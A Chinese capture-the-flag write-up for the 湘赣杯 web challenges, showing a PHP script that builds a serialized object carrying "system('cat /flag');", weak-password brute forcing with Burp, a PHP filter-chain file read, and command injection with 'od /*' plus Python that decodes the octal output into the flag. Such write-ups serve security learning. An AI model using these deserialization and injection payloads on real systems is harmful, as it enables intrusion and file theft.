首页 > 其他分享 >湘赣杯

湘赣杯

时间:2024-07-25 23:09:45浏览次数:6  
标签:bytearray string 湘赣 octal byte data array

Web

驴友小镇

访问shuyulaoshi.txt得到提示
f12得到flag

石能为鼓

f12可以看到提示

访问可以发现是一道简单的反序列化

<?php
show_source(__FILE__);

class ping {
    public $xiang;
}

class cup {
    public $data;

}

$a = new ping();
$a->xiang = new cup();
$a->xiang->data = "system('cat /flag');";
echo urlencode(serialize($a));

d传参得到flag

龙溪秘境

根据paizhaojuzhang.txt的提示
仅凭burp就能破解,结合登录框可推测应该是弱密码爆破
弱密码用户名字典,得到用户名为test
然后将弱密码字典加密,爆破

武功论剑

提示中:陈霸先:朕将御驾亲征,如少侠能使用PHP chain与朕同行,必能将那侯景斩于马下
php过滤链生成器项目
https://github.com/synacktiv/php_filter_chain_generator/blob/main/README.md



传入file变量得到flag

真君擒龙

根据提示cmd传入命令:od /*

# 第一组八进制数据
octal_data_1 = [
    0o66146, 0o63541, 0o61173, 0o30545, 0o34065, 0o60467, 0o26460, 0o33071,
    0o30143, 0o32055, 0o32062, 0o26470, 0o33070, 0o62063, 0o30055, 0o60466
]

# 第二组八进制数据
octal_data_2 = [
    0o61470, 0o33064, 0o61144, 0o60464, 0o76460, 0o00012, 0o00053
]

def octal_to_bytearray(octal_data):
    byte_array = bytearray()
    for octal in octal_data:
        if octal != 0:
            byte_array.extend(octal.to_bytes((octal.bit_length() + 7) // 8, byteorder='big'))
    return byte_array

# 将两组八进制数据分别转换为字节数组
byte_array_1 = octal_to_bytearray(octal_data_1)
byte_array_2 = octal_to_bytearray(octal_data_2)

# 拼接两个字节数组
final_byte_array = byte_array_1 + byte_array_2

# 打印最终的字节数组
print(final_byte_array)
def swap_pairs(s):
    # 交换每两个字符
    return ''.join(s[i+1:i+2] + s[i:i+1] for i in range(0, len(s) - 1, 2))

# 假设 decoded_string 是之前解码得到的字符串
decoded_string = "lfgab{1e85a7-0690c4-42-868d30-a6c864bda4}0"
corrected_string = swap_pairs(decoded_string)

print("Original String:", decoded_string)
print("Corrected String:", corrected_string)

标签:bytearray,string,湘赣,octal,byte,data,array
From: https://www.cnblogs.com/1nnya/p/18324326

相关文章